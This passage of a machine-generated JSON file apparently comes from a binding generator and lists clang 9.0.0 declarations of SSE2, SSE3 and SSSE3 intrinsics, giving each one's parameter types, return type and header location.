"bit-alignment": 16 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3842:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_setr_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3862:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__q0", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__q1", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_setr_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3885:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i0", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i1", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i2", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i3", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_setr_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3916:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w0", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w1", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w2", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w3", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w4", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w5", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w6", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w7", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_setr_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3963:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b0", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b1", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b2", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b3", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b4", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b5", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b6", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b7", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b8", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b9", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b10", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b11", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b12", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b13", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b14", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b15", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_setzero_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3977:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_store_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3995:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i" } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4011:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4032:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4053:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_si16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4074:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_maskmoveu_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4104:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__d", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__n", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storel_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4123:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4146:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_clflush", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4224:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_lfence", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4235:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mfence", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4246:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4275:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4303:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4331:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_movemask_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4399:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4525:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4575:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4596:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4631:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4659:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4682:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4703:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_movepi64_pi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4720:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_movpi64_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4737:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_move_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4755:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4776:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4797:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_movemask_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4816:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_castpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4862:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_castpd_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4879:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_castps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4896:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_castps_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_castsi128_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4930:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_castsi128_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4947:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_pause", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4963:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_lddqu_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_addsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:53:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_hadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_hsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:99:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:121:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_addsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:161:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_hadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_hsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:243:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_monitor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__extensions", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__hints", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mwait", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:283:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__extensions", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__hints", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_abs_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:32:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:50:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_abs_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:86:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_abs_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:104:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hadd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:191:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hadd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hadd_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:237:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_hadd_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:260:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_hadds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hadds_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:310:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_hsub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:333:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hsub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:356:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hsub_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:379:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_hsub_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:402:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_hsubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:427:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hsubs_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:452:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:486:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maddubs_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:536:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mulhrs_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:556:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { 